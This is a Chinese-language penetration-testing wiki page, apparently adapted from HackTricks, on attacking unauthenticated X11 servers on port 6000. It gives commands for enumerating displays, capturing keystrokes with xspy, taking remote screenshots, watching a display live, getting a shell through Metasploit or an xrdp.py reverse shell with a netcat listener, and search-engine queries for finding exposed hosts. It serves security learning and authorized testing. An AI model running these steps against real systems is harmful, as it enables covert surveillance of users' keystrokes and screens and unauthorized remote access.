---
title: "6000 - X11"
weight: 6000
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **6000 - X11** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

> [!WARNING]
> In order to **use the cookie** you should set the env var: **`export XAUTHORITY=/path/to/.Xauthority`**

#### Local 信息收集 Session

```bash
$ w
 23:50:48 up 1 day, 10:32,  1 user,  load average: 0.29, 6.48, 7.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty7     :0               13Oct23 76days 13:37   2.20s xfce4-session
```

In the example, `localhost:0` was running xfce4-session.

### Verfy Connection

```bash
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
```

### Keyloggin

[xspy](http://tools.kali.org/sniffingspoofing/xspy) to sniff the keyboard keystrokes.

Sample Output:

```
xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```

### Screenshots capturing

```bash
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
```

### Remote Desktop View

Way from: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)

```
./xrdp.py <IP:0>
```

Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)

First we need to find the ID of the window using xwininfo

```
xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0
```

**XWatchwin**

For **live viewing** we need to use

```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```

### Get Shell

```
msf> use exploit/unix/x11/x11_keyboard_exec
```

Other way:

**反向 Shell:** Xrdp also allows to take reverse shell via Netcat. Type in the following command:

```bash
./xrdp.py \<IP:0> –no-disp
```

In the interface you can see the **R-shell option**.

Then, start a **Netcat listener** in your local system on port 5555.

```bash
nc -lvp 5555
```

Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell

---


### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="6000"
```

#### Shodan

```bash
# Shodan 搜索语法
port:6000
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:6000
```

---

## 📖 参考资料

- [HackTricks - 6000-x11](https://book.hacktricks.wiki/en/network-services-pentesting/6000-x11.html)